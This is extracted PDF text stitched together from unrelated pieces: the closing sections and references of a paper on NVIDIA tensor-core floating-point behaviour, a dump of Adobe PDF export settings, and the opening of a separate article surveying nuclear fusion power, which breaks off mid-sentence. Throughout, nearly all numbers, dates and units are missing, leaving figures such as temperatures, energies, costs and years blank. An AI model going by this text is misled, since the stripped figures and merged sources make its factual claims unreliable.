experiments indicate that the tensor cores in the nvidia v architecture have the following numerical features. the first two of these (except the rounding mode for the second one) are stated in the nvidia documentation and are confirmed by our fasi et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ experiments, while the rest are not documented by nvidia and have been revealed by our tests. . the binary products in ( ) are computed exactly, and the results are kept in full precision and not rounded to binary after the multiplication. . the additions in ( ) are performed using binary arithmetic with round-towards-zero. . subnormal numbers in binary and binary are supported. . the five summands in ( ) are accumulated starting with the largest in absolute value. . only the final result of ( ) is normalized; the partial sums are not, and the accumulator has an internal significand that is bits wide to accommodate for carries of the -term addition. . the dot products in tensor cores are non-monotonic: in some cases, increasing the magnitude of the inputs to ( ) reduces the magnitude of the final result, when the summands in ( ) are all nonnegative or all nonpositive, the same properties were found in the second generation tensor cores which equip the nvidia t gpus, the main difference being one extra bit of precision in the significand of the internal accumulator of the binary -operand adder. in the third generation of tensor cores, available on the nvidia a gpus, all features were the same as in the t , with the exception of the binary /binary tensor cores, which we found are implemented to behave as if implemented in ieee -compliant arithmetic. the test suite that we have developed as part of this work can be used to test various properties of the floating-point arithmetic of future versions of tensor cores as well as similar accelerators. we aim to keep extending our test suite by adding new test cases for standard non-mixed-precision binary or binary dot product or matrix multiply units, as well as for integer arithmetic. the nvidia turing and ampere tensor cores, for instance, added support for - and -bit integer modes (nvidia, , b), and rounding issues become relevant when these are used to implement fixed-point arithmetic. acknowledgements the authors thank the university of manchester for providing access to the nvidia v graphic cards through the computational shared facility, the it services of the university for setting up access to the nvidia t graphic cards through the amazon web services, and the innovative computing laboratory at the university of tennessee, knoxville, us for providing access to the nvidia a graphics cards. additional information and declarations funding mantas mikaitis was supported by an epsrc doctoral prize fellowship and grant ep/p / . nicholas j. higham and srikara pranesh were supported by engineering and physical sciences research council grant ep/p / . nicholas j. higham and fasi et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ massimiliano fasi were supported by the royal society. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: epsrc: ep/p / . engineering and physical sciences research council: ep/p / . royal society. competing interests nicholas j. higham is an academic editor for peerj computer science. author contributions � massimiliano fasi conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � nicholas j. higham analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � mantas mikaitis conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � srikara pranesh analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: the repository is available at github and contains the source code used for performing the experiments: https://github.com/mfasi/tensor-cores-numerical-behavior. references abdelfattah a, anzt h, boman eg, carson e, cojean t, dongarra j, gates m, grützmacher t, higham nj, li s, lindquist n, liu y, loe j, luszczek p, nayak p, pranesh s, rajamanickam s, ribizel t, smith b, swirydowicz k, thomas s, tomov s, tsai ym, yamazaki i, yang um. . a survey of numerical methods utilizing mixed precision arithmetic. available at https://arxiv.org/abs/ . . arm ltd. . arm architecture reference manual. technical report arm ddi f.b (id ). available at https://developer.arm.com/documentation/ddi /fb/?lang=en. basso pm, dos santos ff, rech p. . impact of tensor cores and mixed precision on the reliability of matrix multiplication in gpus. ieee transactions on nuclear science ( ): – doi . /tns. . . blanchard p, higham nj, lopez f, mary t, pranesh s. . mixed precision block fused multiply-add: error analysis and application to gpu tensor cores. siam journal on scientific computing ( ):c –c doi . / m . ercegovac md, lang t. . digital arithmetic. san francisco: morgan kauffmann. fasi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/mfasi/tensor-cores-numerical-behavior https://arxiv.org/abs/ . https://developer.arm.com/documentation/ddi /fb/?lang=en http://dx.doi.org/ . /tns. . http://dx.doi.org/ . / m http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ google. . system architecture. available at https://cloud.google.com/tpu/docs/system-architecture (accessed april ). haidar a, abdelfattah a, zounon m, wu p, pranesh s, tomov s, dongarra j. a. the design of fast and energy-efficient linear solvers: on the potential of half-precision arithmetic and iterative refinement techniques. in: shi y, fu h, tian y, krzhizhanovskaya vv, lees mh, dongarra j, sloot pma, eds. computational science—iccs , volume of lecture notes in computer science. – . haidar a, bayraktar h, tomov s, dongarra j, higham nj. . mixed-precision solution of linear systems using accelerator-based computing. epub ahead of print november . proceedings of the royal society a: mathematical, physical and engineering sciences doi . /rspa. . . haidar a, tomov s, dongarra j, higham nj. b. harnessing gpu tensor cores for fast fp arithmetic to speed up mixed-precision iterative refinement solvers. in: proceedings of the international conference for high performance computing, networking, storage, and analysis, sc (dallas, tx). piscataway: ieee, : – : . hickmann b, bradford d. . experimental analysis of matrix multiplication functional units. in: proceedings of the th ieee symposium on computer arithmetic, kyoto, japan, – . ieee. . ieee standard for floating-point arithmetic, ieee std - (revision of ieee std - ). piscataway: ieee. intel corporation. . bfloat —hardware numerics definition. available at https://software. intel.com/en-us/download/bfloat -hardware-numerics-definition (accessed july ). intel corporation. . intel architecture instruction set extensions and future features programming reference. available at https://software.intel.com/sites/default/files/managed/c / /architecture-instruction-set-extensions-programming-reference.pdf (accessed july ). jia z, maggioni m, smith j, scarpazza dp. a. dissecting the nvidia turing t gpu via microbenchmarking. available at https://arxiv.org/abs/ . . jia z, maggioni m, staiger b, scarpazza dp. b. dissecting the nvidia volta gpu architecture via microbenchmarking. available at https://arxiv.org/abs/ . . kahan wm. . paranoia. available at http://www.netlib.org/paranoia/paranoia.b (accessed july ). karpinski r. . paranoia: a floating-point benchmark. byte magazine ( ): – . kaul h, anders m, mathew s, kim s, krishnamurthy r. . optimized fused floating-point many-term dot-product hardware for machine learning accelerators. in: proceedings of the th ieee symposium on computer arithmetic. piscataway: ieee, – . kim d, kim l. . a floating-point unit for d vector inner product with reduced latency. ieee transactions on computers ( ): – doi . /tc. . . markidis s, chien swd, laure e, peng ib, vetter js. . nvidia tensor core programmability, performance & precision. in: proceedings of the rd ieee international parallel and distributed processing symposium workshops. piscataway: ieee, – . mukunoki d, ozaki k, ogita t, imamura t. . dgemm using tensor cores, and its accurate and reproducible versions. in: sadayappan p, chamberlain bl, juckeland g, ltaief h, eds. proceedings of the international conference on high performance computing. new york: springer international publishing, – . muller j-m, brunie n, de dinechin f, jeannerod c-p, joldes m, lefèvre v, melquiond g, revol n, torres s. . handbook of floating-point arithmetic. second edition. cham: birkhäuser. fasi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://cloud.google.com/tpu/docs/system-architecture http://dx.doi.org/ . /rspa. . https://software.intel.com/en-us/download/bfloat -hardware-numerics-definition https://software.intel.com/en-us/download/bfloat -hardware-numerics-definition https://software.intel.com/sites/default/files/managed/c / /architecture-instruction-set-extensions-programming-reference.pdf https://software.intel.com/sites/default/files/managed/c / /architecture-instruction-set-extensions-programming-reference.pdf https://arxiv.org/abs/ . https://arxiv.org/abs/ . http://www.netlib.org/paranoia/paranoia.b http://dx.doi.org/ . /tc. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ nvidia. . nvidia tesla v gpu architecture. available at https://images.nvidia.com/ content/volta-architecture/pdf/volta-architecture-whitepaper.pdf (accessed july ). nvidia. . nvidia turing gpu architecture. available at https://www.nvidia.com/content/ dam/en-zz/solutions/design-visualization/technologies/turing-architecture/nvidia-turing- architecture-whitepaper.pdf (accessed july ). nvidia. a. multiply-and-accumulate instruction: mma. available at https://docs.nvidia.com/ cuda/parallel-thread-execution/index.html#warp-level-matrix-instructions-mma (accessed april ). nvidia. b. nvidia a tensor core gpu architecture. available at https://www.nvidia. com/content/dam/en-zz/solutions/data-center/nvidia-ampere-architecture-whitepaper.pdf (accessed july ). nvidia. c. nvidia cuda math api. available at https://docs.nvidia.com/cuda/cuda-math- api/index.html (accessed april ). santoro mr, bewick g, horowitz ma. . rounding algorithms for ieee multipliers. in: proceedings of the th ieee symposium on computer arithmetic. piscataway: ieee, – . sohn j, swartzlander ee. . a fused floating-point four-term dot product unit. ieee transactions on circuits and systems i: regular papers ( ): – doi . /tcsi. . . tao y, deyuan g, xiaoya f, nurmi j. . correctly rounded architectures for floating-point multi-operand addition and dot-product computation. in: proceedings of the th international conference on application-specific systems, architectures and processors. – . tenca af. . multi-operand floating-point addition. in: proceedings of the th ieee symposium on computer arithmetic. piscataway: ieee, – . yan d, wang w, chu x. . demystifying tensor cores to optimize half-precision matrix multiply. in: ieee international parallel and distributed processing symposium, new orleans, la, usa. piscataway: ieee, – . fasi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://images.nvidia.com/content/volta-architecture/pdf/volta-architecture-whitepaper.pdf https://images.nvidia.com/content/volta-architecture/pdf/volta-architecture-whitepaper.pdf https://www.nvidia.com/content/dam/en-zz/solutions/design-visualization/technologies/turing-architecture/nvidia-turing-architecture-whitepaper.pdf https://www.nvidia.com/content/dam/en-zz/solutions/design-visualization/technologies/turing-architecture/nvidia-turing-architecture-whitepaper.pdf https://www.nvidia.com/content/dam/en-zz/solutions/design-visualization/technologies/turing-architecture/nvidia-turing-architecture-whitepaper.pdf https://docs.nvidia.com/cuda/parallel-thread-execution/index.html#warp-level-matrix-instructions-mma https://docs.nvidia.com/cuda/parallel-thread-execution/index.html#warp-level-matrix-instructions-mma https://www.nvidia.com/content/dam/en-zz/solutions/data-center/nvidia-ampere-architecture-whitepaper.pdf https://www.nvidia.com/content/dam/en-zz/solutions/data-center/nvidia-ampere-architecture-whitepaper.pdf https://docs.nvidia.com/cuda/cuda-math-api/index.html https://docs.nvidia.com/cuda/cuda-math-api/index.html http://dx.doi.org/ . /tcsi. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ numerical behavior of nvidia tensor cores introduction previous work results conclusions flink references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice international journal of advanced network, monitoring and controls volume , no. , doi: . /ijanmc- - nuclear fusion power – an overview of history, present and future stewart c. prager department of physics university of wisconsin – madison madison, wi , usa e-mail: scprager@wisc.edu summary—fusion power offers the prospect of an almost inexhaustible source of energy for future generations, but it also presents so far insurmountable engineering challenges. the fundamental challenge is to achieve a rate of heat emitted by a fusion plasma that exceeds the rate of energy injected into the plasma. the main hope is centered on tokamak reactors and stellarators which confine deuterium-tritium plasma magnetically. keywords-fusion energy; hydrogen power; nuclear fusion i. introduction today, many countries take part in fusion research to some extent, led by the european union, the usa, russia and japan, with vigorous programs also underway in china, brazil, canada, and korea. initially, fusion research in the usa and ussr was linked to atomic weapons development, and it remained classified until the atoms for peace conference in geneva. following a breakthrough at the soviet tokamak, fusion research became 'big science' in the s. but the cost and complexity of the devices involved increased to the point where international co- operation was the only way forward. fusion powers the sun and stars as hydrogen atoms fuse together to form helium, and matter is converted into energy. hydrogen, heated to very high temperatures changes from a gas to plasma in which the negatively-charged electrons are separated from the positively-charged atomic nuclei (ions). normally, fusion is not possible because the strongly repulsive electrostatic forces between the positively charged nuclei prevent them from getting close enough together to collide and for fusion to occur. however, if the conditions are such that the nuclei can overcome the electrostatic forces to the extent that they can come within a very close range of each other, then the attractive nuclear force (which binds protons and neutrons together in atomic nuclei) between the nuclei will outweigh the repulsive (electrostatic) force, allowing the nuclei to fuse together. such conditions can occur when the temperature increases, causing the ions to move faster and eventually reach speeds high enough to bring the ions close enough together. the nuclei can then fuse, causing a release of energy. ii. fusion technology in the sun, massive gravitational forces create the right conditions for fusion, but on earth they are much harder to achieve. fusion fuel – different isotopes of hydrogen – must be heated to extreme temperatures of the order of million degrees celsius, and must be kept stable under intense pressure, hence dense enough and confined for long enough to allow the nuclei to fuse. the aim of the controlled fusion research program is to achieve 'ignition', which occurs when enough fusion reactions take place for the process to become self-sustaining, with fresh fuel then being added to continue it. once ignition is achieved, there is net energy yield – about four times as much as with nuclear fission. according to the massachusetts institute of technology (mit), the amount of power produced increases with the square of the pressure, so doubling the pressure leads to a fourfold increase in energy production. with current technology, the reaction most readily feasible is between the nuclei of the two heavy forms (isotopes) of hydrogen – deuterium (d) and tritium (t). each d-t fusion event releases . mev ( . x - joule, compared with mev for a u- fission and - mev for d-d fusion). a on a mass basis, the d- t fusion reaction releases over four times as much energy as uranium fission. deuterium occurs naturally in seawater ( grams per cubic metre), which makes it very abundant relative to other energy resources. tritium occurs naturally only in trace quantities (produced by cosmic rays) and is radioactive, with a half-life of around years. usable quantities can be made in a conventional nuclear reactor, or in the present context, bred in a fusion system from lithium. https://www.world-nuclear.org/information-library/current-and-future-generation/nuclear-fusion-power.aspx#notes international journal of advanced network, monitoring and controls volume , no. , b lithium is found in large quantities ( parts per million) in the earth's crust and in weaker concentrations in the sea. in a fusion reactor, the concept is that neutrons generated from the d-t fusion reaction will be absorbed in a blanket containing lithium which surrounds the core. the lithium is then transformed into tritium (which is used to fuel the reactor) and helium. the blanket must be thick enough (about metre) to slow down the high-energy ( mev) neutrons. the kinetic energy of the neutrons is absorbed by the blanket, causing it to heat up. the heat energy is collected by the coolant (water, helium or li- pb eutectic) flowing through the blanket and, in a fusion power plant, this energy will be used to generate electricity by conventional methods. if insufficient tritium is produced, some supplementary source must be employed such as using a fission reactor to irradiate heavy water or lithium with neutrons, and extraneous tritium creates difficulties with handling, storage and transport. the difficulty has been to develop a device that can heat the d-t fuel to a high enough temperature and confine it long enough so that more energy is released through fusion reactions than is used to get the reaction going. while the d-t reaction is the main focus of attention, long-term hopes are for a d-d reaction, but this requires much higher temperatures. in any case, the challenge is to apply the heat to human needs, primarily generating electricity. the energy density of fusion reactions in gas is very much less than for fission reactions in solid fuel, and as noted the heat yield per reaction is times less. hence thermonuclear fusion will always have a much lower power density than nuclear fission, which means that any fusion reactor needs to be larger and therefore more costly, than a fission reactor of the same power output. in addition, nuclear fission reactors use solid fuel which is denser than thermonuclear plasma, so the energy released is more concentrated. also the neutron energy from fusion is higher than from fission – . mev instead of about mev, which presents significant challenges regarding structural materials. at present, two main experimental approaches are being studied: magnetic confinement and inertial confinement. the first method uses strong magnetic fields to contain the hot plasma. the second involves compressing a small pellet containing fusion fuel to extremely high densities using strong lasers or particle beams. iii. magnetic confinement in magnetic confinement fusion (mcf), hundreds of cubic metres of d-t plasma at a density of less than a milligram per cubic metre are confined by a magnetic field at a few atmospheres pressure and heated to fusion temperature. magnetic fields are ideal for confining a plasma because the electrical charges on the separated ions and electrons mean that they follow the magnetic field lines. the aim is to prevent the particles from coming into contact with the reactor walls as this will dissipate their heat and slow them down. the most effective magnetic configuration is toroidal, shaped like a doughnut, in which the magnetic field is curved around to form a closed loop. for proper confinement, this toroidal field must have superimposed upon it a perpendicular field component (a poloidal field). the result is a magnetic field with force lines following spiral (helical) paths that confine and control the plasma. there are several types of toroidal confinement system, the most important being tokamaks, stellarators and reversed field pinch (rfp) devices. in a tokamak, the toroidal field is created by a series of coils evenly spaced around the torus-shaped reactor, and the poloidal field is created by a system of horizontal coils outside the toroidal magnet structure. a strong electric current is induced in the plasma using a central solenoid, and this induced current also contributes to the poloidal field. in a stellarator, the helical lines of force are produced by a series of coils which may themselves be helical in shape. unlike tokamaks, stellarators do not require a toroidal current to be induced in the plasma. rfp devices have the same toroidal and poloidal components as a tokamak, but the current flowing through the plasma is much stronger and the direction of the toroidal field within the plasma is reversed. in tokamaks and rfp devices, the current flowing through the plasma also serves to heat it to a temperature of about million degrees celsius. beyond that, additional heating systems are needed to achieve the temperatures necessary for fusion. in stellarators, these heating systems have to supply all the energy needed. the tokamak (toroidalnya kamera ee magnetnaya katushka–torus-shaped magnetic chamber) was designed in by soviet physicists andrei sakharov and igor tamm. tokamaks operate within limited parameters outside which sudden losses of energy confinement (disruptions) can occur, causing major thermal and mechanical stresses to the structure and https://www.world-nuclear.org/information-library/current-and-future-generation/nuclear-fusion-power.aspx#notes international journal of advanced network, monitoring and controls volume , no. , walls. nevertheless, it is considered the most promising design, and research is continuing on various tokamaks around the world. research is also being carried out on several types of stellarator. lyman spitzer devised and began work on the first fusion device – a stellarator–at the princeton plasma physics laboratory in . due to the difficulty in confining plasmas, stellarators fell out of favour until computer modelling techniques allowed accurate geometries to be calculated. because stellarators have no toroidal plasma current, plasma stability is increased compared with tokamaks. since the burning plasma can be more easily controlled and monitored, stellerators have an intrinsic potential for steady-state, continuous operation. the disadvantage is that, due to their more complex shape, stellarators are much more complex than tokamaks to design and build. rfp devices differ from tokamaks mainly in the spatial distribution of the toroidal magnetic field, which changes sign at the edge of the plasma. the rfx machine in padua, italy is used to study the physical problems arising from the spontaneous reorganisation of the magnetic field, which is an intrinsic feature of this configuration. iv. inertial confinement in inertial confinement fusion, which is a newer line of research, laser or ion beams are focused very precisely onto the surface of a target, which is a pellet of d-t fuel, a few millimetres in diameter. this heats the outer layer of the material, which explodes outwards generating an inward-moving compression front or implosion that compresses and heats the inner layers of material. the core of the fuel may be compressed to one thousand times its liquid density, resulting in conditions where fusion can occur. the energy released then would heat the surrounding fuel, which may also undergo fusion leading to a chain reaction (known as ignition) as the reaction spreads outwards through the fuel. the time required for these reactions to occur is limited by the inertia of the fuel (hence the name), but is less than a microsecond. so far, most inertial confinement work has involved lasers. recent work at osaka university's institute of laser engineering in japan suggests that ignition may be achieved at lower temperature with a second very intense laser pulse guided through a millimetre-high gold cone into the compressed fuel, and timed to coincide with the peak compression. this technique, known as 'fast ignition', means that fuel compression is separated from hot spot generation with ignition, making the process more practical. a completely different concept, the 'z-pinch' (or 'zeta pinch'), uses a strong electrical current in a plasma to generate x-rays, which compress a tiny d-t fuel cylinder. v. magnetized target fusion magnetized target fusion (mtf), also referred to as magneto-inertial fusion (mif), is a pulsed approach to fusion that combines the compressional heating of inertial confinement fusion with the magnetically reduced thermal transport and magnetically enhanced alpha heating of magnetic confinement fusion. a range of mtf systems are currently being experimented with, and commonly use a magnetic field to confine a plasma with compressional heating provided by laser, electromagnetic or mechanical liner implosion. as a result of this combined approach, shorter plasma confinement times are required than for magnetic confinement (from ns to ms, depending on the mif approach), reducing the requirement to stabilize the plasma for long periods. conversely, compression can be achieved over timescales longer than those typical for inertial confinement, making it possible to achieve compression through mechanical, magnetic, chemical, or relatively low-powered laser drivers. several approaches are underway to examine mtf, including experiments at los alamos national laboratory, sandia national laboratory, the university of rochester, and private companies general fusion and helion energy. r&d challenges for mtf include whether a suitable target plasma can be formed and heated to fusion conditions while avoiding contamination from the liner, as with magnetic confinement and inertial confinement. due to the reduced demands on confinement time and compression velocities, mtf has been pursued as a lower-cost and simpler approach to investigating these challenges than conventional fusion projects. vi. hybrid fusion fusion can also be combined with fission in what is referred to as hybrid nuclear fusion where the blanket surrounding the core is a subcritical fission reactor. the fusion reaction acts as a source of neutrons for the surrounding blanket, where these neutrons are captured, resulting in fission reactions taking place. these fission reactions would also produce more neutrons, thereby assisting further fission reactions in the blanket. international journal of advanced network, monitoring and controls volume , no. , the concept of hybrid fusion can be compared with an accelerator-driven system (ads), where an accelerator is the source of neutrons for the blanket assembly, rather than nuclear fusion reactions (see page on accelerator-driven nuclear energy). the blanket of a hybrid fusion system can therefore contain the same fuel as an ads – for example, the abundant element thorium or the long-lived heavy isotopes present in used nuclear fuel (from a conventional reactor) could be used as fuel. the blanket containing fission fuel in a hybrid fusion system would not require the development of new materials capable of withstanding constant neutron bombardment, whereas such materials would be needed in the blanket of a 'conventional' fusion system. a further advantage of a hybrid system is that the fusion part would not need to produce as many neutrons as a (non-hybrid) fusion reactor would in order to generate more power than is consumed – so a commercial-scale fusion reactor in a hybrid system does not need to be as large as a fusion-only reactor. vii. fusion research a long-standing quip about fusion points out that, since the s, commercial deployment of fusion power has always been about years away. while there is some truth in this, many breakthroughs have been made, particularly in recent years, and there are a number of major projects under development that may bring research to the point where fusion power can be commercialized. several tokamaks have been built, including the joint european torus (jet) and the mega amp spherical tokamak (mast)in the uk and the tokamak fusion test reactor (tftr) at princeton in the usa. the iter (international thermonuclear experimental reactor) project currently under construction in cadarache, france will be the largest tokamak when it operates in the s. the chinese fusion engineering test reactor (cfetr) is a tokamak which is reported to be larger than iter, and due for completion in .meanwhile it is running its experimental advanced superconducting tokamak (east). much research has also been carried out on stellarators. a large one of these, the large helical device at japan's national institute of fusion research, began operating in . it is being used to study the best magnetic configuration for plasma confinement. at the garching site of the max planck institute for plasma physics in germany, research carried out at the wendelstein -as between and is being progressed at the wendelstein -x, which was built over years at max planck institute's greifswald site and started up at the end of .another stellarator, tjii, is in operation in madrid, spain. in the usa, at princeton plasma physics laboratory, where the first stellarators were built in , construction on the ncsx stellerator was abandoned in due to cost overruns and lack of funding . there have also been significant developments in research into inertial fusion energy (ife). construction of the $ billion national ignition facility (nif) at the lawrence livermore national laboratory (llnl), funded by the national nuclear security administration, was completed in march . the laser mégajoule (lmj) in france’s bordeaux region started operation in october . both are designed to deliver, in a few billionths of a second, nearly two million joules of light energy to targets measuring a few millimeters in size. the main purpose of both nif and lmj is for research to support both countries' respective nuclear weapons programs. viii. iter in , the soviet union suggested building a next generation tokamak with europe, japan and the usa. collaboration was established under the auspices of the international atomic energy agency (iaea). between and , the initial designs were drawn up for an international thermonuclear experimental reactor (iter, which also means 'a path' or 'journey' in latin) with the aim of proving that fusion could produce useful energy. the four parties agreed in to collaborate further on engineering design activities for iter. canada and kazakhstan are also involved through euratom and russia, respectively. six years later, the iter council approved the first comprehensive design of a fusion reactor based on well-established physics and technology with a price tag of $ billion. then the usa decided pull out of the project, forcing a % reduction in costs and a redesign. the result was the iter fusion energy advanced tokomak (iter-feat) – initially expected to cost $ billion but still achieve the targets of a self-sustaining reaction and a net energy gain. the envisaged energy gain is unlikely to be enough for a power plant, but it should demonstrate feasibility. in , the usa rejoined the project and china also announced it would join. after deadlocked discussion, the six partners agreed in mid- to site iter at cadarache, in southern france. the deal involved major concessions to japan, which had put forward rokkasho as a preferred site. the european https://www.world-nuclear.org/information-library/current-and-future-generation/nuclear-fusion-power.aspx#references international journal of advanced network, monitoring and controls volume , no. , union (eu) and france would contribute half of the then estimated € . billion total cost, with the other partners – japan, china, south korea, usa and russia – putting in % each. japan will provide a lot of the high-tech components, will host a € billion materials testing facility – the international fusion materials irradiation facility (ifmif) – and will have the right to host a subsequent demonstration fusion reactor. india became the seventh member of the iter consortium at the end of . in november , the seven members – china, india, japan, russia, south korea, the usa and the european union – signed the iter implementing agreement. the total cost of the mw iter comprises about half for the ten-year construction and half for years of operation. site preparation works at cadarache commenced in january . first concrete for the buildings was poured in december . experiments were due to begin in , when hydrogen will be used to avoid activating the magnets, but this is now expected in . the first d-t plasma is not expected until .iter is large because confinement time increases with the cube of machine size. the vacuum vessel will be m across and m high, and weigh more than tonnes. the goal of iter is to operate with a plasma thermal output of mw (for at least seconds continuously) with less than mw of plasma heating power input. no electricity will be generated at iter. an associated cea facility at cadarache is west, formerly tore supra, which is designed to test prototype components and accelerate their development for iter. it is focused on the divertor structure to remove helium, testing the durability of tungsten materials used. a gw demonstration power plant, known as demo, is expected to demonstrate large-scale production of electrical power on a continual basis. the conceptual design of demo was expected to be completed by , with construction beginning around and the first phase of operation commencing from . it has since been delayed, with construction now planned for after . ix. jet in , the european community (euratom, along with sweden and switzerland) launched the joint european torus (jet) project in the uk. jet is the largest tokamak operating in the world today. a similar tokamak, jt- , operates at the naka fusion institute of japan atomic energy agency in japan, but only jet has the facilities to use d-t fuel. following a legal dispute with euratom, in december jet's international contract ended and the united kingdom atomic energy authority (ukaea) took over the management of jet on behalf of its european partners. from that time jet's experimental programme has been co-ordinated by the european fusion development agreement (efda) parties. c jet produced its first plasma in , and became the first experiment to produce controlled fusion power in november , albeit with high input of electricity. up to mw of fusion power for one second and mw sustained has been achieved in d-t plasmas using the device, from mw of power injected into its heating system, and many experiments are conducted to study different heating schemes and other techniques. jet has been very successful in operating remote handling techniques in a radioactive environment to modify the interior of the device and has shown that the remote handling maintenance of fusion devices is realistic. jet is a key device in preparations for iter. it has been significantly upgraded in recent years to test iter plasma physics 